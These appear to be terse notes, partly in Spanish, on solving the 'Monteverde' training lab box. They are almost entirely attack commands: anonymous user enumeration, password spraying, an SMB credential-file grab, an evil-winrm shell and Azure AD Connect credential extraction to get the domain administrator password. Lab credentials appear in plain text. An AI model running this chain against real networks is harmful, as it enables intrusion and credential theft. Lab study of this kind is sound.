Monteverde
rpcclient -U '' 10.10.10.172 -c "enumdomusers" -N | tr '[]' ' '| awk '{print $2}' > validUsers.txt
netexec smb 10.10.10.172 -u validUsers.txt -p validUsers.txt -d megabank.local --continue-on-success --no-bruteforce
SABatchJobs \ SABatchJobs
smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs'
smbclient //10.10.10.172/azure_uploads -U SABatchJobs%SABatchJobs
smbclient //10.10.10.172/users\$ -U SABatchJobs%SABatchJobs
get azure.xml
4n0therD4y@n0th3r$
netexec smb 10.10.10.172 -u validUsers.txt -p '4n0therD4y@n0th3r$' -d megabank.local --continue-on-success
mhope \ 4n0therD4y@n0th3r$
evil-winrm -i 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'
Como somos azure admins , podemos extraer las credenciales de todo el Azure AD
https://github.com/CloudyKhan/Azure-AD-Connect-Credential-Extractor.git
upload /mnt/Windows/Hacking/tools/EntraID/Azure-AD-Connect-Credential-Extractor/decrypt.ps1
./decrypt.ps1
administrator \ d0m@in4dminyeah!